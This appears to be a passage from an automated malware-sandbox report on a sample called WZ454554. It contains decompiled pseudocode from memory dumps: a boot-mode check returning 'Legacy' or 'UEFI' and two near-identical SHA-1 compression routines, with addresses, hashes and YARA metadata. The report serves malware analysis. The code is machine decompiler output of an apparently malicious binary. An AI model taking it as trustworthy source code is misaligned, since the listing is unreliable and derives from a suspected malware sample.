					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L00AD4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E00AFAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E00B3500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E00AF9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                            0x00b351be
                            0x00b351c3
                            0x00b351c8
                            0x00b351cd
                            0x00b351d0
                            0x00b351d3
                            0x00b351d8
                            0x00b351db
                            0x00b351de
                            0x00b351e0
                            0x00b351e3
                            0x00b351e6
                            0x00b351e8
                            0x00b35342
                            0x00b35351
                            0x00b35356
                            0x00b3535a
                            0x00b35360
                            0x00b35363
                            0x00b35366
                            0x00b35369
                            0x00b35369
                            0x00b3536b
                            0x00b3536b
                            0x00b35370
                            0x00b353a3
                            0x00b353a4
                            0x00b353a6
                            0x00b353ab
                            0x00b353ab
                            0x00b353ae
                            0x00b353ae
                            0x00b353b5
                            0x00b353bf
                            0x00b353bf
                            0x00b35375
                            0x00b35396
                            0x00b353a0
                            0x00b353a0
                            0x00000000
                            0x00b35396
                            0x00b35377
                            0x00b35379
                            0x00b3537f
                            0x00b3538c
                            0x00b35390
                            0x00000000
                            0x00b35390
                            0x00b351ee
                            0x00b351f1
                            0x00b35301
                            0x00b35310
                            0x00b35315
                            0x00b35318
                            0x00b3531b
                            0x00b35320
                            0x00b3532e
                            0x00b35331
                            0x00000000
                            0x00b35331
                            0x00b35328
                            0x00b35329
                            0x00000000
                            0x00b35329
                            0x00b351fa
                            0x00b35235
                            0x00b35236
                            0x00b35239
                            0x00b3523f
                            0x00b35240
                            0x00b35241
                            0x00b35242
                            0x00b35246
                            0x00b35247
                            0x00b3524e
                            0x00b35251
                            0x00b35267
                            0x00b35269
                            0x00b3526e
                            0x00b3527d
                            0x00b3527e
                            0x00b35281
                            0x00b35282
                            0x00b35287
                            0x00b35288
                            0x00b3528a
                            0x00b3528f
                            0x00b35294
                            0x00000000
                            0x00000000
                            0x00b3529a
                            0x00b3529c
                            0x00b3529e
                            0x00b3529e
                            0x00b352a4
                            0x00b352b0
                            0x00000000
                            0x00000000
                            0x00b352ba
                            0x00b352bc
                            0x00b352bc
                            0x00b352d4
                            0x00b352d9
                            0x00b352dc
                            0x00b352e1
                            0x00000000
                            0x00000000
                            0x00b352e7
                            0x00b352f4
                            0x00000000
                            0x00b352f4
                            0x00b35270
                            0x00000000
                            0x00b35270
                            0x00b351fc
                            0x00b351fd
                            0x00b35202
                            0x00b35203
                            0x00b35205
                            0x00b3520a
                            0x00b3520f
                            0x00000000
                            0x00000000
                            0x00b3521b
                            0x00b35226
                            0x00b3522b
                            0x00b3521d
                            0x00b3521d
                            0x00b35222
                            0x00b35222
                            0x00b3522d
                            0x00000000

                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: Legacy$UEFI
                            • API String ID: 2994545307-634100481
                            • Opcode ID: 183d25a8fed48bb8f02fd02b17be08bd989c98427995bb200cad39c1cfc7b027
                            • Instruction ID: 7bb2c5e061bb2b4d7b2f8cf7b30f9119ac712d8533905f1b1db02d351052f461
                            • Opcode Fuzzy Hash: 183d25a8fed48bb8f02fd02b17be08bd989c98427995bb200cad39c1cfc7b027
                            • Instruction Fuzzy Hash: 32515071E00A199FDB24DFA8C990BAEBBF8FF48740F24406DE54AEB251D6719900CB54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00409E5B, Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 72%
                            			E00409E5B(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t319;
				signed int _t321;
				signed int _t324;
				signed int _t326;
				signed int _t335;
				signed int _t341;
				signed int _t342;
				signed int _t347;
				signed int _t355;
				signed int _t359;
				signed int _t360;
				signed int _t364;
				signed int _t367;
				signed int _t371;
				signed int _t372;
				signed int _t401;
				signed int _t406;
				signed int _t412;
				signed int _t415;
				signed int _t422;
				signed int _t425;
				signed int _t434;
				signed int _t436;
				signed int _t439;
				signed int _t447;
				signed int _t462;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t473;
				signed int _t481;
				signed int _t482;
				signed int* _t483;
				signed int* _t486;
				signed int _t493;
				signed int _t496;
				signed int _t501;
				signed int _t504;
				signed int _t507;
				signed int _t510;
				signed int _t511;
				signed int _t515;
				signed int _t527;
				signed int _t530;
				signed int _t537;
				void* _t543;
				void* _t545;

				asm("int3");
				asm("arpl [eax-0x1374aa90], bp");
				_t543 = _t545;
				_t486 = _a4;
				_t355 = 0;
				_t2 =  &(_t486[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t543 + _t355 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t543 + _t355 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t543 + _t355 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t543 + _t355 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t355 = _t355 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t355 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t401 =  *(_t278 - 0x18);
					_t462 =  *(_t278 - 0x14);
					_t359 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t401;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t462;
					_t278[8] = _t359;
					_t319 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t319 ^ _t401;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t359 ^ _t462;
				} while ( *_t46 != 0);
				_t321 =  *_t486;
				_t279 = _t486[1];
				_t360 = _t486[2];
				_t406 = _t486[3];
				_v12 = _t321;
				_v16 = _t486[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t465 = _v8;
					_t493 = _t321 + ( !_t279 & _t406 | _t360 & _t279) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t324 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t406;
					_v12 = _t493;
					asm("rol esi, 0x5");
					_v8 = _t360;
					_t412 = _t493 + ( !_t324 & _t360 | _t279 & _t324) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t496 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t364 = _v12;
					_v8 = _t324;
					_t326 = _v8;
					_v12 = _t412;
					asm("rol edx, 0x5");
					_t285 = _t412 + ( !_t364 & _t496 | _t324 & _t364) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t415 = _v12;
					_v16 = _t496;
					asm("ror ecx, 0x2");
					_v8 = _t364;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t326;
					_t501 = _t285 + ( !_t415 & _t326 | _t364 & _t415) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t360 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t415;
					_v12 = _t501;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t504 = _t501 + ( !_t360 & _t288 | _t415 & _t360) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t406 = _v8;
					asm("ror ecx, 0x2");
					_t466 = _t465 + 5;
					_t321 = _t504;
					_v12 = _t321;
					_v8 = _t466;
				} while (_t466 < 0x14);
				_t467 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t406;
					_t507 = _t504 + (_t406 ^ _t360 ^ _t279) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t335 = _v12;
					_v12 = _t507;
					asm("rol esi, 0x5");
					_t422 = _t507 + (_t360 ^ _t279 ^ _t335) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t510 = _t279;
					_v16 = _t360;
					_t367 = _v12;
					_v12 = _t422;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t422 + (_t279 ^ _t335 ^ _t367) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t425 = _v12;
					_v8 = _t335;
					_v8 = _t367;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t467 = _t467 + 5;
					_t360 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t510 + 0x6ed9eba1; // 0x6ed9eb9f
					_t511 = _t292 + (_t335 ^ _v8 ^ _t425) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t425;
					_v12 = _t511;
					asm("rol esi, 0x5");
					_t406 = _v8;
					_t504 = _t511 + (_t295 ^ _v8 ^ _t360) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x150)) + _t335 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t504;
				} while (_t467 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t406;
					asm("ror eax, 0x2");
					_t515 = ((_t360 | _t279) & _t406 | _t360 & _t279) +  *((intOrPtr*)(_t543 + _v8 * 4 - 0x14c)) + _t504 + _v16 - 0x70e44324;
					_t473 = _v12;
					_v12 = _t515;
					asm("rol esi, 0x5");
					_t341 = _v8;
					asm("ror edi, 0x2");
					_t434 = ((_t279 | _t473) & _t360 | _t279 & _t473) +  *((intOrPtr*)(_t543 + _t341 * 4 - 0x148)) + _t515 + _v16 - 0x70e44324;
					_v16 = _t360;
					_t371 = _v12;
					_v12 = _t434;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t436 = ((_t473 | _t371) & _t279 | _t473 & _t371) +  *((intOrPtr*)(_t543 + _t341 * 4 - 0x144)) + _t434 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t473;
					_v12 = _t436;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t527 = ((_t371 | _t299) & _t473 | _t371 & _t299) +  *((intOrPtr*)(_t543 + _t341 * 4 - 0x140)) + _t436 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t439 = _t371;
					_t360 = _v12;
					_v8 = _t439;
					_v12 = _t527;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t504 = ((_t299 | _t360) & _t439 | _t299 & _t360) +  *((intOrPtr*)(_t543 + _t341 * 4 - 0x13c)) + _t527 + _v16 - 0x70e44324;
					_t406 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t504;
					_t342 = _t341 + 5;
					_v8 = _t342;
				} while (_t342 < 0x3c);
				_t481 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t482 = _v8;
					asm("ror eax, 0x2");
					_t530 = (_t406 ^ _t360 ^ _t279) +  *((intOrPtr*)(_t543 + _t481 * 4 - 0x14c)) + _t504 + _v16 - 0x359d3e2a;
					_t347 = _v12;
					_v16 = _t406;
					_v12 = _t530;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t447 = (_t360 ^ _t279 ^ _t347) +  *((intOrPtr*)(_t543 + _t482 * 4 - 0x148)) + _t530 + _v16 - 0x359d3e2a;
					_v16 = _t360;
					_t372 = _v12;
					_v12 = _t447;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t347 ^ _t372) +  *((intOrPtr*)(_t543 + _t482 * 4 - 0x144)) + _t447 + _v16 - 0x359d3e2a;
					_t406 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t347;
					_t537 = (_t347 ^ _t372 ^ _t406) +  *((intOrPtr*)(_t543 + _t482 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t372;
					_v8 = _t347;
					asm("ror edx, 0x2");
					_v8 = _t372;
					_t360 = _v12;
					_v12 = _t537;
					asm("rol esi, 0x5");
					_t481 = _t482 + 5;
					_t504 = (_t305 ^ _t406 ^ _t360) +  *((intOrPtr*)(_t543 + _t482 * 4 - 0x13c)) + _t537 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t406;
					_v12 = _t504;
					_v8 = _t481;
				} while (_t481 < 0x50);
				_t483 = _a4;
				_t483[2] = _t483[2] + _t360;
				_t483[3] = _t483[3] + _t406;
				_t311 = _t483[4] + _v16;
				 *_t483 =  *_t483 + _t504;
				_t483[1] = _t483[1] + _t279;
				_t483[4] = _t311;
				_t483[0x17] = 0;
				return _t311;
			}

































































                            0x00409e5b
                            0x00409e5d
                            0x00409e61
                            0x00409e6b
                            0x00409e6f
                            0x00409e71
                            0x00409e71
                            0x00409e74
                            0x00409e96
                            0x00409ebc
                            0x00409ee2
                            0x00409f04
                            0x00409f0b
                            0x00409f0e
                            0x00409f11
                            0x00409f1a
                            0x00409f20
                            0x00409f27
                            0x00409f38
                            0x00409f3b
                            0x00409f3e
                            0x00409f42
                            0x00409f44
                            0x00409f46
                            0x00409f4f
                            0x00409f52
                            0x00409f55
                            0x00409f60
                            0x00409f66
                            0x00409f68
                            0x00409f68
                            0x00409f6b
                            0x00409f6e
                            0x00409f6e
                            0x00409f73
                            0x00409f75
                            0x00409f78
                            0x00409f7b
                            0x00409f81
                            0x00409f84
                            0x00409f87
                            0x00409f90
                            0x00409f96
                            0x00409f9f
                            0x00409fae
                            0x00409fb5
                            0x00409fb8
                            0x00409fbb
                            0x00409fc4
                            0x00409fc7
                            0x00409fca
                            0x00409fe2
                            0x00409fe9
                            0x00409feb
                            0x00409fee
                            0x00409ff1
                            0x00409ffa
                            0x0040a001
                            0x0040a004
                            0x0040a007
                            0x0040a016
                            0x0040a01d
                            0x0040a020
                            0x0040a023
                            0x0040a02c
                            0x0040a036
                            0x0040a039
                            0x0040a045
                            0x0040a048
                            0x0040a04f
                            0x0040a052
                            0x0040a055
                            0x0040a05a
                            0x0040a05d
                            0x0040a066
                            0x0040a077
                            0x0040a07a
                            0x0040a07d
                            0x0040a084
                            0x0040a087
                            0x0040a08a
                            0x0040a08d
                            0x0040a08f
                            0x0040a092
                            0x0040a095
                            0x0040a09e
                            0x0040a0a3
                            0x0040a0a3
                            0x0040a0b8
                            0x0040a0bb
                            0x0040a0be
                            0x0040a0c5
                            0x0040a0c8
                            0x0040a0cb
                            0x0040a0e0
                            0x0040a0e7
                            0x0040a0ea
                            0x0040a0ee
                            0x0040a0f1
                            0x0040a0f6
                            0x0040a0f9
                            0x0040a108
                            0x0040a10b
                            0x0040a112
                            0x0040a115
                            0x0040a118
                            0x0040a11b
                            0x0040a11e
                            0x0040a126
                            0x0040a134
                            0x0040a137
                            0x0040a13a
                            0x0040a13a
                            0x0040a141
                            0x0040a144
                            0x0040a147
                            0x0040a14f
                            0x0040a15d
                            0x0040a160
                            0x0040a167
                            0x0040a16a
                            0x0040a16d
                            0x0040a170
                            0x0040a173
                            0x0040a17c
                            0x0040a183
                            0x0040a183
                            0x0040a189
                            0x0040a1a2
                            0x0040a1a5
                            0x0040a1ac
                            0x0040a1af
                            0x0040a1b2
                            0x0040a1c4
                            0x0040a1ce
                            0x0040a1d1
                            0x0040a1da
                            0x0040a1dd
                            0x0040a1e4
                            0x0040a1e7
                            0x0040a1ed
                            0x0040a200
                            0x0040a207
                            0x0040a20a
                            0x0040a20d
                            0x0040a210
                            0x0040a219
                            0x0040a21c
                            0x0040a22f
                            0x0040a232
                            0x0040a23c
                            0x0040a23f
                            0x0040a241
                            0x0040a24a
                            0x0040a24d
                            0x0040a260
                            0x0040a266
                            0x0040a269
                            0x0040a270
                            0x0040a272
                            0x0040a275
                            0x0040a278
                            0x0040a27b
                            0x0040a27e
                            0x0040a281
                            0x0040a28a
                            0x0040a28f
                            0x0040a292
                            0x0040a292
                            0x0040a2a5
                            0x0040a2a8
                            0x0040a2ab
                            0x0040a2b2
                            0x0040a2b5
                            0x0040a2b8
                            0x0040a2bb
                            0x0040a2ce
                            0x0040a2d1
                            0x0040a2dc
                            0x0040a2df
                            0x0040a2eb
                            0x0040a2ee
                            0x0040a2f4
                            0x0040a2f7
                            0x0040a2fa
                            0x0040a301
                            0x0040a311
                            0x0040a314
                            0x0040a31a
                            0x0040a31d
                            0x0040a324
                            0x0040a326
                            0x0040a329
                            0x0040a32c
                            0x0040a32f
                            0x0040a332
                            0x0040a339
                            0x0040a348
                            0x0040a34b
                            0x0040a352
                            0x0040a355
                            0x0040a358
                            0x0040a35b
                            0x0040a35e
                            0x0040a361
                            0x0040a364
                            0x0040a36d
                            0x0040a37e
                            0x0040a386
                            0x0040a38c
                            0x0040a38f
                            0x0040a391
                            0x0040a394
                            0x0040a397
                            0x0040a3a4

                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: (
                            • API String ID: 0-3887548279
                            • Opcode ID: 657b2d4e8b3fd4a3d2179b3e627b95895095b8205359dbc824bd294ea25055e1
                            • Instruction ID: 07147e9931562b4cb97720730bf1c66158ee9f61d90213a2622bc4259cf1e293
                            • Opcode Fuzzy Hash: 657b2d4e8b3fd4a3d2179b3e627b95895095b8205359dbc824bd294ea25055e1
                            • Instruction Fuzzy Hash: 9E022CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00409E60, Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 73%
                            			E00409E60(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
